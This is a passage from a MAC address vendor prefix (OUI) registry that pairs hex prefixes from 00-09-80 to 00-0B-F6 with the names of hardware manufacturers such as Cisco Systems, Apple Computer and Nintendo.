LTD. 00-09-80 (hex) Power Zenith Inc. 00-09-81 (hex) Newport Networks 00-09-82 (hex) Loewe Opta GmbH 00-09-83 (hex) Gvision Incorporated 00-09-84 (hex) MyCasa Network Inc. 00-09-85 (hex) Auto Telecom Company 00-09-86 (hex) Metalink LTD. 00-09-87 (hex) NISHI NIPPON ELECTRIC WIRE & CABLE CO.,LTD. 00-09-88 (hex) Nudian Electron Co., Ltd. 00-09-89 (hex) VividLogic Inc. 00-09-8A (hex) EqualLogic Inc 00-09-8B (hex) Entropic Communications, Inc. 00-09-8C (hex) Option Wireless Sweden 00-09-8D (hex) Velocity Semiconductor 00-09-8E (hex) ipcas GmbH 00-09-8F (hex) Cetacean Networks 00-09-90 (hex) ACKSYS Communications & systems 00-09-91 (hex) GE Fanuc Automation Manufacturing, Inc. 00-09-92 (hex) InterEpoch Technology,INC. 00-09-93 (hex) Visteon Corporation 00-09-94 (hex) Cronyx Engineering 00-09-95 (hex) Castle Technology Ltd 00-09-96 (hex) RDI 00-09-97 (hex) Nortel Networks 00-09-98 (hex) Capinfo Company Limited 00-09-99 (hex) CP GEORGES RENAULT 00-09-9A (hex) ELMO COMPANY, LIMITED 00-09-9B (hex) Western Telematic Inc. 00-09-9C (hex) Naval Research Laboratory 00-09-9D (hex) Haliplex Communications 00-09-9E (hex) Testech, Inc. 00-09-9F (hex) VIDEX INC. 00-09-A0 (hex) Microtechno Corporation 00-09-A1 (hex) Telewise Communications, Inc. 00-09-A2 (hex) Interface Co., Ltd. 00-09-A3 (hex) Leadfly Techologies Corp. Ltd. 00-09-A4 (hex) HARTEC Corporation 00-09-A5 (hex) HANSUNG ELETRONIC INDUSTRIES DEVELOPMENT CO., LTD 00-09-A6 (hex) Ignis Optics, Inc. 00-09-A7 (hex) Bang & Olufsen A/S 00-09-A8 (hex) Eastmode Pte Ltd 00-09-A9 (hex) Ikanos Communications 00-09-AA (hex) Data Comm for Business, Inc. 00-09-AB (hex) Netcontrol Oy 00-09-AC (hex) LANVOICE 00-09-AD (hex) HYUNDAI SYSCOMM, INC. 00-09-AE (hex) OKANO ELECTRIC CO.,LTD 00-09-AF (hex) e-generis 00-09-B0 (hex) Onkyo Corporation 00-09-B1 (hex) Kanematsu Electronics, Ltd. 00-09-B2 (hex) L&F Inc. 00-09-B3 (hex) MCM Systems Ltd 00-09-B4 (hex) KISAN TELECOM CO., LTD. 00-09-B5 (hex) 3J Tech. Co., Ltd. 00-09-B6 (hex) Cisco Systems 00-09-B7 (hex) Cisco Systems 00-09-B8 (hex) Entise Systems 00-09-B9 (hex) Action Imaging Solutions 00-09-BA (hex) MAKU Informationstechik GmbH 00-09-BB (hex) MathStar, Inc. 00-09-BC (hex) Digital Safety Technologies, Inc 00-09-BD (hex) Epygi Technologies, Ltd. 00-09-BE (hex) Mamiya-OP Co.,Ltd. 00-09-BF (hex) Nintendo Co.,Ltd. 00-09-C0 (hex) 6WIND Montigny-le-Bretonneux 78180 00-09-C1 (hex) PROCES-DATA A/S 00-09-C2 (hex) Onity, Inc. 00-09-C3 (hex) NETAS 00-09-C4 (hex) Medicore Co., Ltd 00-09-C5 (hex) KINGENE Technology Corporation 00-09-C6 (hex) Visionics Corporation 00-09-C7 (hex) Movistec 00-09-C8 (hex) SINAGAWA TSUSHIN KEISOU SERVICE 00-09-C9 (hex) BlueWINC Co., Ltd. 00-09-CA (hex) iMaxNetworks(Shenzhen)Limited. 00-09-CB (hex) HBrain 00-09-CC (hex) Moog GmbH 00-09-CD (hex) HUDSON SOFT CO.,LTD. C62,Geijutsu-no-mori 00-09-CE (hex) SpaceBridge Semiconductor Corp. 00-09-CF (hex) iAd GmbH 00-09-D0 (hex) Solacom Technologies Inc. 00-09-D1 (hex) SERANOA NETWORKS INC 00-09-D2 (hex) Mai Logic Inc. 00-09-D3 (hex) Western DataCom Co., Inc. 00-09-D4 (hex) Transtech Networks 00-09-D5 (hex) Signal Communication, Inc. 00-09-D6 (hex) KNC One GmbH 00-09-D7 (hex) DC Security Products 00-09-D8 (hex) Fält Communications AB 00-09-D9 (hex) Neoscale Systems, Inc 00-09-DA (hex) Control Module Inc. 00-09-DB (hex) eSpace 00-09-DC (hex) Galaxis Technology AG 00-09-DD (hex) Mavin Technology Inc. 00-09-DE (hex) Samjin Information & Communications Co., Ltd. 00-09-DF (hex) Vestel Komunikasyon Sanayi ve Ticaret A.S. 00-09-E0 (hex) XEMICS S.A. 00-09-E1 (hex) Gemtek Technology Co., Ltd. 00-09-E2 (hex) Sinbon Electronics Co., Ltd. 00-09-E3 (hex) Angel Iglesias S.A. 00-09-E4 (hex) K Tech Infosystem Inc. 00-09-E5 (hex) Hottinger Baldwin Messtechnik GmbH 00-09-E6 (hex) Cyber Switching Inc. 00-09-E7 (hex) ADC Techonology 00-09-E8 (hex) Cisco Systems 00-09-E9 (hex) Cisco Systems 00-09-EA (hex) YEM Inc. 00-09-EB (hex) HuMANDATA LTD. 00-09-EC (hex) Daktronics, Inc. 00-09-ED (hex) CipherOptics 00-09-EE (hex) MEIKYO ELECTRIC CO.,LTD 00-09-EF (hex) Vocera Communications 00-09-F0 (hex) Shimizu Technology Inc. 00-09-F1 (hex) Yamaki Electric Corporation 00-09-F2 (hex) Cohu, Inc., Electronics Division 00-09-F3 (hex) WELL Communication Corp. 00-09-F4 (hex) Alcon Laboratories, Inc. 00-09-F5 (hex) Emerson Network Power Co.,Ltd 00-09-F6 (hex) Shenzhen Eastern Digital Tech Ltd. 00-09-F7 (hex) SED, a division of Calian 00-09-F8 (hex) UNIMO TECHNOLOGY CO., LTD. 00-09-F9 (hex) ART JAPAN CO., LTD. 00-09-FB (hex) Philips Patient Monitoring 00-09-FC (hex) IPFLEX Inc. 00-09-FD (hex) Ubinetics Limited 00-09-FE (hex) Daisy Technologies, Inc. 00-09-FF (hex) X.net 2000 GmbH 00-0A-00 (hex) Mediatek Corp. 00-0A-01 (hex) SOHOware, Inc. 00-0A-02 (hex) ANNSO CO., LTD. 00-0A-03 (hex) ENDESA SERVICIOS, S.L. 00-0A-04 (hex) 3Com Ltd 00-0A-05 (hex) Widax Corp. 00-0A-06 (hex) Teledex LLC 00-0A-07 (hex) WebWayOne Ltd 00-0A-08 (hex) ALPINE ELECTRONICS, INC. 00-0A-09 (hex) TaraCom Integrated Products, Inc. 00-0A-0A (hex) SUNIX Co., Ltd. 00-0A-0B (hex) Sealevel Systems, Inc. 00-0A-0C (hex) Scientific Research Corporation 00-0A-0D (hex) FCI Deutschland GmbH 00-0A-0E (hex) Invivo Research Inc. 00-0A-0F (hex) Ilryung Telesys, Inc 00-0A-10 (hex) FAST media integrations AG 00-0A-11 (hex) ExPet Technologies, Inc 00-0A-12 (hex) Azylex Technology, Inc 00-0A-13 (hex) Honeywell Video Systems 00-0A-14 (hex) TECO a.s. 00-0A-15 (hex) Silicon Data, Inc 00-0A-16 (hex) Lassen Research 00-0A-17 (hex) NESTAR COMMUNICATIONS, INC 00-0A-18 (hex) Vichel Inc. 00-0A-19 (hex) Valere Power, Inc. 00-0A-1A (hex) Imerge Ltd 00-0A-1B (hex) Stream Labs 00-0A-1C (hex) Bridge Information Co., Ltd. 00-0A-1D (hex) Optical Communications Products Inc. 00-0A-1E (hex) Red-M Products Limited 00-0A-1F (hex) ART WARE Telecommunication Co., Ltd. 00-0A-20 (hex) SVA Networks, Inc. 00-0A-21 (hex) Integra Telecom Co. Ltd 00-0A-22 (hex) Amperion Inc 00-0A-23 (hex) Parama Networks Inc 00-0A-24 (hex) Octave Communications 00-0A-25 (hex) CERAGON NETWORKS 00-0A-26 (hex) CEIA S.p.A. 00-0A-27 (hex) Apple Computer, Inc. 00-0A-28 (hex) Motorola 00-0A-29 (hex) Pan Dacom Networking AG 00-0A-2A (hex) QSI Systems Inc. 00-0A-2B (hex) Etherstuff 00-0A-2C (hex) Active Tchnology Corporation 00-0A-2D (hex) Cabot Communications Limited 00-0A-2E (hex) MAPLE NETWORKS CO., LTD 00-0A-2F (hex) Artnix Inc. 00-0A-30 (hex) Johnson Controls-ASG 00-0A-31 (hex) HCV Consulting 00-0A-32 (hex) Xsido Corporation 00-0A-33 (hex) Emulex Corporation 00-0A-34 (hex) Identicard Systems Incorporated 00-0A-35 (hex) Xilinx 00-0A-36 (hex) Synelec Telecom Multimedia 00-0A-37 (hex) Procera Networks, Inc. 00-0A-38 (hex) Apani Networks 00-0A-39 (hex) LoPA Information Technology 00-0A-3A (hex) J-THREE INTERNATIONAL Holding Co., Ltd. 00-0A-3B (hex) GCT Semiconductor, Inc 00-0A-3C (hex) Enerpoint Ltd. 00-0A-3D (hex) Elo Sistemas Eletronicos S.A. 00-0A-3E (hex) EADS Telecom 00-0A-3F (hex) Data East Corporation 00-0A-40 (hex) Crown Audio -- Harmanm International 00-0A-41 (hex) Cisco Systems 00-0A-42 (hex) Cisco Systems 00-0A-43 (hex) Chunghwa Telecom Co., Ltd. 00-0A-44 (hex) Avery Dennison Deutschland GmbH 00-0A-45 (hex) Audio-Technica Corp. 00-0A-46 (hex) ARO WELDING TECHNOLOGIES SAS 00-0A-47 (hex) Allied Vision Technologies 00-0A-48 (hex) Albatron Technology 00-0A-49 (hex) F5 Networks, Inc. 00-0A-4A (hex) Targa Systems Ltd. 00-0A-4B (hex) DataPower Technology, Inc. 00-0A-4C (hex) Molecular Devices Corporation 00-0A-4D (hex) Noritz Corporation 00-0A-4E (hex) UNITEK Electronics INC. 00-0A-4F (hex) Brain Boxes Limited 00-0A-50 (hex) REMOTEK CORPORATION 00-0A-51 (hex) GyroSignal Technology Co., Ltd. 00-0A-52 (hex) AsiaRF Ltd. 00-0A-53 (hex) Intronics, Incorporated 00-0A-54 (hex) Laguna Hills, Inc. 00-0A-55 (hex) MARKEM Corporation 00-0A-56 (hex) HITACHI Maxell Ltd. 00-0A-57 (hex) Hewlett-Packard Company - Standards 00-0A-58 (hex) Ingenieur-Buero Freyer & Siegel 00-0A-59 (hex) HW server 00-0A-5A (hex) GreenNET Technologies Co.,Ltd. 00-0A-5B (hex) Power-One as 00-0A-5C (hex) Carel s.p.a. 00-0A-5D (hex) PUC Founder (MSC) Berhad 00-0A-5E (hex) 3COM Corporation 00-0A-5F (hex) almedio inc. 00-0A-60 (hex) Autostar Technology Pte Ltd 00-0A-61 (hex) Cellinx Systems Inc. 00-0A-62 (hex) Crinis Networks, Inc. 00-0A-63 (hex) DHD GmbH 00-0A-64 (hex) Eracom Technologies 00-0A-65 (hex) GentechMedia.co.,ltd. 00-0A-66 (hex) MITSUBISHI ELECTRIC SYSTEM & SERVICE CO.,LTD. 00-0A-67 (hex) OngCorp 00-0A-68 (hex) SolarFlare Communications, Inc. 00-0A-69 (hex) SUNNY bell Technology Co., Ltd. 00-0A-6A (hex) SVM Microwaves s.r.o. 00-0A-6B (hex) Tadiran Telecom Business Systems LTD 00-0A-6C (hex) Walchem Corporation 00-0A-6D (hex) EKS Elektronikservice GmbH 00-0A-6E (hex) Broadcast Technology Limited 00-0A-6F (hex) ZyFLEX Technologies Inc 00-0A-70 (hex) MPLS Forum 00-0A-71 (hex) Avrio Technologies, Inc 00-0A-72 (hex) STEC, INC. 00-0A-73 (hex) Scientific Atlanta 00-0A-74 (hex) Manticom Networks Inc. 00-0A-75 (hex) Caterpillar, Inc 00-0A-76 (hex) Beida Jade Bird Huaguang Technology Co.,Ltd 00-0A-77 (hex) Bluewire Technologies LLC 00-0A-78 (hex) OLITEC 00-0A-79 (hex) Allied Telesis K.K. corega division 00-0A-7A (hex) Kyoritsu Electric Co., Ltd. 00-0A-7B (hex) Cornelius Consult 00-0A-7C (hex) Tecton Ltd 00-0A-7D (hex) Valo, Inc. 00-0A-7E (hex) The Advantage Group 00-0A-7F (hex) Teradon Industries, Inc 00-0A-80 (hex) Telkonet Inc. 00-0A-81 (hex) TEIMA Audiotex S.L. 00-0A-82 (hex) TATSUTA SYSTEM ELECTRONICS CO.,LTD. 00-0A-83 (hex) SALTO SYSTEMS S.L. 00-0A-84 (hex) Rainsun Enterprise Co., Ltd. 00-0A-85 (hex) PLAT'C2,Inc 00-0A-86 (hex) Lenze 00-0A-87 (hex) Integrated Micromachines Inc. 00-0A-88 (hex) InCypher S.A. 00-0A-89 (hex) Creval Systems, Inc. 00-0A-8A (hex) Cisco Systems 00-0A-8B (hex) Cisco Systems 00-0A-8C (hex) Guardware Systems Ltd. 00-0A-8D (hex) EUROTHERM LIMITED 00-0A-8E (hex) Invacom Ltd 00-0A-8F (hex) Aska International Inc. 00-0A-90 (hex) Bayside Interactive, Inc. 00-0A-91 (hex) HemoCue AB 00-0A-92 (hex) Presonus Corporation 00-0A-93 (hex) W2 Networks, Inc. 00-0A-94 (hex) ShangHai cellink CO., LTD 00-0A-95 (hex) Apple Computer, Inc. 00-0A-96 (hex) MEWTEL TECHNOLOGY INC. 00-0A-97 (hex) SONICblue, Inc. 00-0A-98 (hex) M+F Gwinner GmbH & Co 00-0A-99 (hex) Calamp Wireless Networks Inc 00-0A-9A (hex) Aiptek International Inc 00-0A-9B (hex) Towa Meccs Corporation 00-0A-9C (hex) Server Technology, Inc. 00-0A-9D (hex) King Young Technology Co. Ltd. 00-0A-9E (hex) BroadWeb Corportation 00-0A-9F (hex) Pannaway Technologies, Inc. 00-0A-A0 (hex) Cedar Point Communications 00-0A-A1 (hex) V V S Limited 00-0A-A2 (hex) SYSTEK INC. 00-0A-A3 (hex) SHIMAFUJI ELECTRIC CO.,LTD. 00-0A-A4 (hex) SHANGHAI SURVEILLANCE TECHNOLOGY CO,LTD 00-0A-A5 (hex) MAXLINK INDUSTRIES LIMITED 00-0A-A6 (hex) Hochiki Corporation 00-0A-A7 (hex) FEI Electron Optics 00-0A-A8 (hex) ePipe Pty. Ltd. 00-0A-A9 (hex) Brooks Automation GmbH 00-0A-AA (hex) AltiGen Communications Inc. 00-0A-AB (hex) Toyota Technical Development Corporation 00-0A-AC (hex) TerraTec Electronic GmbH 00-0A-AD (hex) Stargames Corporation 00-0A-AE (hex) Rosemount Process Analytical 00-0A-AF (hex) Pipal Systems 00-0A-B0 (hex) LOYTEC electronics GmbH 00-0A-B1 (hex) GENETEC Corporation 00-0A-B2 (hex) Fresnel Wireless Systems 00-0A-B3 (hex) Fa. GIRA 00-0A-B4 (hex) ETIC Telecommunications 00-0A-B5 (hex) Digital Electronic Network 00-0A-B6 (hex) COMPUNETIX, INC 00-0A-B7 (hex) Cisco Systems 00-0A-B8 (hex) Cisco Systems 00-0A-B9 (hex) Astera Technologies Corp. 00-0A-BA (hex) Arcon Technology Limited 00-0A-BB (hex) Taiwan Secom Co,. Ltd 00-0A-BC (hex) Seabridge Ltd. 00-0A-BD (hex) Rupprecht & Patashnick Co. 00-0A-BE (hex) OPNET Technologies CO., LTD. 00-0A-BF (hex) HIROTA SS 00-0A-C0 (hex) Fuyoh Video Industry CO., LTD. 00-0A-C1 (hex) Futuretel 00-0A-C2 (hex) FiberHome Telecommunication Technologies CO.,LTD 00-0A-C3 (hex) eM Technics Co., Ltd. 00-0A-C4 (hex) Daewoo Teletech Co., Ltd 00-0A-C5 (hex) Color Kinetics 00-0A-C6 (hex) Ceterus Networks, Inc. 00-0A-C7 (hex) Unication Group 00-0A-C8 (hex) ZPSYS CO.,LTD. (Planning&Management) 00-0A-C9 (hex) Zambeel Inc 00-0A-CA (hex) YOKOYAMA SHOKAI CO.,Ltd. 00-0A-CB (hex) XPAK MSA Group 00-0A-CC (hex) Winnow Networks, Inc. 00-0A-CD (hex) Sunrich Technology Limited 00-0A-CE (hex) RADIANTECH, INC. 00-0A-CF (hex) PROVIDEO Multimedia Co. Ltd. 00-0A-D0 (hex) Niigata Develoment Center, F.I.T. Co., Ltd. 00-0A-D1 (hex) MWS 00-0A-D2 (hex) JEPICO Corporation 00-0A-D3 (hex) INITECH Co., Ltd 00-0A-D4 (hex) CoreBell Systems Inc. 00-0A-D5 (hex) Brainchild Electronic Co., Ltd. 00-0A-D6 (hex) BeamReach Networks 00-0A-D7 (hex) Origin ELECTRIC CO.,LTD. 00-0A-D8 (hex) IPCserv Technology Corp. 00-0A-D9 (hex) Sony Ericsson Mobile Communications AB 00-0A-DA (hex) Vindicator Technologies 00-0A-DB (hex) SkyPilot Network, Inc 00-0A-DC (hex) RuggedCom Inc. 00-0A-DD (hex) Allworx Corp. 00-0A-DE (hex) Happy Communication Co., Ltd. 00-0A-DF (hex) Gennum Corporation 00-0A-E0 (hex) Fujitsu Softek 00-0A-E1 (hex) EG Technology 00-0A-E2 (hex) Binatone Electronics International, Ltd 00-0A-E3 (hex) YANG MEI TECHNOLOGY CO., LTD 00-0A-E4 (hex) Wistron Corp. 00-0A-E5 (hex) ScottCare Corporation 00-0A-E6 (hex) Elitegroup Computer System Co. (ECS) 00-0A-E7 (hex) ELIOP S.A. 00-0A-E8 (hex) Cathay Roxus Information Technology Co. LTD 00-0A-E9 (hex) AirVast Technology Inc. 00-0A-EA (hex) ADAM ELEKTRONIK LTD.STI. 00-0A-EB (hex) Shenzhen Tp-Link Technology Co; Ltd. 00-0A-EC (hex) Koatsu Gas Kogyo Co., Ltd. 00-0A-ED (hex) HARTING Systems GmbH & Co KG 00-0A-EE (hex) GCD Hard- & Software GmbH 00-0A-EF (hex) OTRUM ASA 00-0A-F0 (hex) SHIN-OH ELECTRONICS CO., LTD. R&D 00-0A-F1 (hex) Clarity Design, Inc. 00-0A-F2 (hex) NeoAxiom Corp. 00-0A-F3 (hex) Cisco Systems 00-0A-F4 (hex) Cisco Systems 00-0A-F5 (hex) Airgo Networks, Inc. 00-0A-F6 (hex) Emerson Climate Technologies Retail Solutions, Inc. 00-0A-F7 (hex) Broadcom Corp. 00-0A-F8 (hex) American Telecare Inc. 00-0A-F9 (hex) HiConnect, Inc. 00-0A-FA (hex) Traverse Technologies Australia 00-0A-FB (hex) Ambri Limited 00-0A-FC (hex) Core Tec Communications, LLC 00-0A-FD (hex) Viking Electronic Services 00-0A-FE (hex) NovaPal Ltd 00-0A-FF (hex) Kilchherr Elektronik AG 00-0B-00 (hex) FUJIAN START COMPUTER EQUIPMENT CO.,LTD 00-0B-01 (hex) DAIICHI ELECTRONICS CO., LTD. 00-0B-02 (hex) Dallmeier electronic 00-0B-03 (hex) Taekwang Industrial Co., Ltd 00-0B-04 (hex) Volktek Corporation 00-0B-05 (hex) Pacific Broadband Networks 00-0B-06 (hex) Motorola Mobility, Inc. 00-0B-07 (hex) Voxpath Networks 00-0B-08 (hex) Pillar Data Systems 00-0B-09 (hex) Ifoundry Systems Singapore 00-0B-0A (hex) dBm Optics 00-0B-0B (hex) Corrent Corporation 00-0B-0C (hex) Agile Systems Inc. 00-0B-0D (hex) Air2U, Inc. 00-0B-0E (hex) Trapeze Networks 00-0B-0F (hex) Nyquist Industrial Control BV 00-0B-10 (hex) 11wave Technonlogy Co.,Ltd 00-0B-11 (hex) HIMEJI ABC TRADING CO.,LTD. 00-0B-12 (hex) NURI Telecom Co., Ltd. 00-0B-13 (hex) ZETRON INC 00-0B-14 (hex) ViewSonic Corporation 00-0B-15 (hex) Platypus Technology 00-0B-16 (hex) Communication Machinery Corporation 00-0B-17 (hex) MKS Instruments 00-0B-18 (hex) PRIVATE 00-0B-19 (hex) Vernier Networks, Inc. 00-0B-1A (hex) Industrial Defender, Inc. 00-0B-1B (hex) Systronix, Inc. 00-0B-1C (hex) SIBCO bv 00-0B-1D (hex) LayerZero Power Systems, Inc. 00-0B-1E (hex) KAPPA opto-electronics GmbH 00-0B-1F (hex) I CON Computer Co. 00-0B-20 (hex) Hirata corporation 00-0B-21 (hex) G-Star Communications Inc. 00-0B-22 (hex) Environmental Systems and Services 00-0B-23 (hex) Siemens Subscriber Networks 00-0B-24 (hex) AirLogic 00-0B-25 (hex) Aeluros 00-0B-26 (hex) Wetek Corporation 00-0B-27 (hex) Scion Corporation 00-0B-28 (hex) Quatech Inc. 00-0B-29 (hex) LS(LG) Industrial Systems co.,Ltd 00-0B-2A (hex) HOWTEL Co., Ltd. 00-0B-2B (hex) HOSTNET CORPORATION 00-0B-2C (hex) Eiki Industrial Co. Ltd. 00-0B-2D (hex) Danfoss Inc. 00-0B-2E (hex) Cal-Comp Electronics (Thailand) Public Company Limited Taipe 00-0B-2F (hex) bplan GmbH 00-0B-30 (hex) Beijing Gongye Science & Technology Co.,Ltd 00-0B-31 (hex) Yantai ZhiYang Scientific and technology industry CO., LTD 00-0B-32 (hex) VORMETRIC, INC. 00-0B-33 (hex) Vivato Technologies 00-0B-34 (hex) ShangHai Broadband Technologies CO.LTD 00-0B-35 (hex) Quad Bit System co., Ltd. 00-0B-36 (hex) Productivity Systems, Inc. 00-0B-37 (hex) MANUFACTURE DES MONTRES ROLEX SA 00-0B-38 (hex) Knuerr AG 00-0B-39 (hex) Keisoku Giken Co.,Ltd. 00-0B-3A (hex) QuStream Corporation 00-0B-3B (hex) devolo AG 00-0B-3C (hex) Cygnal Integrated Products, Inc. 00-0B-3D (hex) CONTAL OK Ltd. 00-0B-3E (hex) BittWare, Inc 00-0B-3F (hex) Anthology Solutions Inc. 00-0B-40 (hex) OpNext Inc. 00-0B-41 (hex) Ing. Buero Dr. Beutlhauser 00-0B-42 (hex) commax Co., Ltd. 00-0B-43 (hex) Microscan Systems, Inc. 00-0B-44 (hex) Concord IDea Corp. 00-0B-45 (hex) Cisco 00-0B-46 (hex) Cisco 00-0B-47 (hex) Advanced Energy 00-0B-48 (hex) sofrel 00-0B-49 (hex) RF-Link System Inc. 00-0B-4A (hex) Visimetrics (UK) Ltd 00-0B-4B (hex) VISIOWAVE SA 00-0B-4C (hex) Clarion (M) Sdn Bhd 00-0B-4D (hex) Emuzed 00-0B-4E (hex) VertexRSI, General Dynamics SatCOM Technologies, Inc. 00-0B-4F (hex) Verifone, INC. 00-0B-50 (hex) Oxygnet 00-0B-51 (hex) Micetek International Inc. 00-0B-52 (hex) JOYMAX ELECTRONICS CO. LTD. 00-0B-53 (hex) INITIUM Co., Ltd. 00-0B-54 (hex) BiTMICRO Networks, Inc. 00-0B-55 (hex) ADInstruments 00-0B-56 (hex) Cybernetics 00-0B-57 (hex) Silicon Laboratories 00-0B-58 (hex) Astronautics C.A LTD 00-0B-59 (hex) ScriptPro, LLC 00-0B-5A (hex) HyperEdge 00-0B-5B (hex) Rincon Research Corporation 00-0B-5C (hex) Newtech Co.,Ltd 00-0B-5D (hex) FUJITSU LIMITED 00-0B-5E (hex) Audio Engineering Society Inc. 00-0B-5F (hex) Cisco Systems 00-0B-60 (hex) Cisco Systems 00-0B-61 (hex) Friedrich Lütze GmbH &Co. 00-0B-62 (hex) Ingenieurbuero fuer Elektronikdesign Ingo Mohnen 00-0B-63 (hex) Kaleidescape 00-0B-64 (hex) Kieback & Peter GmbH & Co KG 00-0B-65 (hex) Sy.A.C. srl 00-0B-66 (hex) Teralink Communications 00-0B-67 (hex) Topview Technology Corporation 00-0B-68 (hex) Addvalue Communications Pte Ltd 00-0B-69 (hex) Franke Finland Oy 00-0B-6A (hex) Asiarock Incorporation 00-0B-6B (hex) Wistron Neweb Corp. 00-0B-6C (hex) Sychip Inc. 00-0B-6D (hex) SOLECTRON JAPAN NAKANIIDA 00-0B-6E (hex) Neff Instrument Corp. 00-0B-6F (hex) Media Streaming Networks Inc 00-0B-70 (hex) Load Technology, Inc. 00-0B-71 (hex) Litchfield Communications Inc. 00-0B-72 (hex) Lawo AG 00-0B-73 (hex) Kodeos Communications 00-0B-74 (hex) Kingwave Technology Co., Ltd. 00-0B-75 (hex) Iosoft Ltd. 00-0B-76 (hex) ET&T Technology Co. Ltd. 00-0B-77 (hex) Cogent Systems, Inc. 00-0B-78 (hex) TAIFATECH INC. 00-0B-79 (hex) X-COM, Inc. 00-0B-7A (hex) Wave Science Inc. 00-0B-7B (hex) Test-Um Inc. 00-0B-7C (hex) Telex Communications 00-0B-7D (hex) SOLOMON EXTREME INTERNATIONAL LTD. 00-0B-7E (hex) SAGINOMIYA Seisakusho Inc. 00-0B-7F (hex) OmniWerks 00-0B-80 (hex) Lycium Networks 00-0B-81 (hex) Kaparel Corporation 00-0B-82 (hex) Grandstream Networks, Inc. 00-0B-83 (hex) DATAWATT B.V. 00-0B-84 (hex) BODET 00-0B-85 (hex) Cisco Systems 00-0B-86 (hex) Aruba Networks 00-0B-87 (hex) American Reliance Inc. 00-0B-88 (hex) Vidisco ltd. 00-0B-89 (hex) Top Global Technology, Ltd. 00-0B-8A (hex) MITEQ Inc. 00-0B-8B (hex) KERAJET, S.A. 00-0B-8C (hex) Flextronics 00-0B-8D (hex) Avvio Networks 00-0B-8E (hex) Ascent Corporation 00-0B-8F (hex) AKITA ELECTRONICS SYSTEMS CO.,LTD. 00-0B-90 (hex) Adva Optical Networking Inc. 00-0B-91 (hex) Aglaia Gesellschaft für Bildverarbeitung und Kommunikation m 00-0B-92 (hex) Ascom Danmark A/S 00-0B-93 (hex) Ritter Elektronik 00-0B-94 (hex) Digital Monitoring Products, Inc. 00-0B-95 (hex) eBet Gaming Systems Pty Ltd 00-0B-96 (hex) Innotrac Diagnostics Oy 00-0B-97 (hex) Matsushita Electric Industrial Co.,Ltd. 00-0B-98 (hex) NiceTechVision 00-0B-99 (hex) SensAble Technologies, Inc. 00-0B-9A (hex) Shanghai Ulink Telecom Equipment Co. Ltd. 00-0B-9B (hex) Sirius System Co, Ltd. 00-0B-9C (hex) TriBeam Technologies, Inc. 00-0B-9D (hex) TwinMOS Technologies Inc. 00-0B-9E (hex) Yasing Technology Corp. 00-0B-9F (hex) Neue ELSA GmbH 00-0B-A0 (hex) T&L Information Inc. 00-0B-A1 (hex) SYSCOM Ltd. 00-0B-A2 (hex) Sumitomo Electric Networks, Inc 00-0B-A3 (hex) Siemens AG, I&S 00-0B-A4 (hex) Shiron Satellite Communications Ltd. (1996) 00-0B-A5 (hex) Quasar Cipta Mandiri, PT 00-0B-A6 (hex) Miyakawa Electric Works Ltd. 00-0B-A7 (hex) Maranti Networks 00-0B-A8 (hex) HANBACK ELECTRONICS CO., LTD. 00-0B-A9 (hex) CloudShield Technologies, Inc. 00-0B-AA (hex) Aiphone co.,Ltd 00-0B-AB (hex) Advantech Technology (CHINA) Co., Ltd. 00-0B-AC (hex) 3Com Ltd 00-0B-AD (hex) PC-PoS Inc. 00-0B-AE (hex) Vitals System Inc. 00-0B-AF (hex) WOOJU COMMUNICATIONS Co,.Ltd 00-0B-B0 (hex) Sysnet Telematica srl 00-0B-B1 (hex) Super Star Technology Co., Ltd. 00-0B-B2 (hex) SMALLBIG TECHNOLOGY 00-0B-B3 (hex) RiT technologies Ltd. 00-0B-B4 (hex) RDC Semiconductor Inc., 00-0B-B5 (hex) nStor Technologies, Inc. 00-0B-B6 (hex) Metalligence Technology Corp. 00-0B-B7 (hex) Micro Systems Co.,Ltd. 00-0B-B8 (hex) Kihoku Electronic Co. 00-0B-B9 (hex) Imsys AB 00-0B-BA (hex) Harmonic Broadband Access Networks 00-0B-BB (hex) Etin Systems Co., Ltd 00-0B-BC (hex) En Garde Systems, Inc. 00-0B-BD (hex) Connexionz Limited 00-0B-BE (hex) Cisco Systems 00-0B-BF (hex) Cisco Systems 00-0B-C0 (hex) China IWNComm Co., Ltd. 00-0B-C1 (hex) Bay Microsystems, Inc. 00-0B-C2 (hex) Corinex Communication Corp. 00-0B-C3 (hex) Multiplex, Inc. 00-0B-C4 (hex) BIOTRONIK GmbH & Co 00-0B-C5 (hex) SMC Networks, Inc. 00-0B-C6 (hex) ISAC, Inc. 00-0B-C7 (hex) ICET S.p.A. 00-0B-C8 (hex) AirFlow Networks 00-0B-C9 (hex) Electroline Equipment 00-0B-CA (hex) DATAVAN International Corporation 00-0B-CB (hex) Fagor Automation , S. Coop 00-0B-CC (hex) JUSAN, S.A. 00-0B-CD (hex) Hewlett-Packard Company 00-0B-CE (hex) Free2move AB 00-0B-CF (hex) AGFA NDT INC. 00-0B-D0 (hex) XiMeta Technology Americas Inc. 00-0B-D1 (hex) Aeronix, Inc. 00-0B-D2 (hex) Remopro Technology Inc. 00-0B-D3 (hex) cd3o 00-0B-D4 (hex) Beijing Wise Technology & Science Development Co.Ltd 00-0B-D5 (hex) Nvergence, Inc. 00-0B-D6 (hex) Paxton Access Ltd 00-0B-D7 (hex) DORMA Time + Access GmbH 00-0B-D8 (hex) Industrial Scientific Corp. 00-0B-D9 (hex) General Hydrogen 00-0B-DA (hex) EyeCross Co.,Inc. 00-0B-DB (hex) Dell ESG PCBA Test 00-0B-DC (hex) AKCP 00-0B-DD (hex) TOHOKU RICOH Co., LTD. 00-0B-DE (hex) TELDIX GmbH 00-0B-DF (hex) Shenzhen RouterD Networks Limited 00-0B-E0 (hex) SercoNet Ltd. 00-0B-E1 (hex) Nokia NET Product Operations 00-0B-E2 (hex) Lumenera Corporation 00-0B-E3 (hex) Key Stream Co., Ltd. 00-0B-E4 (hex) Hosiden Corporation 00-0B-E5 (hex) HIMS Korea Co., Ltd. 00-0B-E6 (hex) Datel Electronics 00-0B-E7 (hex) COMFLUX TECHNOLOGY INC. 00-0B-E8 (hex) AOIP 00-0B-E9 (hex) Actel Corporation 00-0B-EA (hex) Zultys Technologies 00-0B-EB (hex) Systegra AG 00-0B-EC (hex) NIPPON ELECTRIC INSTRUMENT, INC. 00-0B-ED (hex) ELM Inc. 00-0B-EE (hex) inc.jet, Incorporated 00-0B-EF (hex) Code Corporation 00-0B-F0 (hex) MoTEX Products Co., Ltd. 00-0B-F1 (hex) LAP Laser Applikations 00-0B-F2 (hex) Chih-Kan Technology Co., Ltd. 00-0B-F3 (hex) BAE SYSTEMS 00-0B-F4 (hex) PRIVATE 00-0B-F5 (hex) Shanghai Sibo Telecom Technology Co.,Ltd 00-0B-F6 (hex) Nitgen Co., 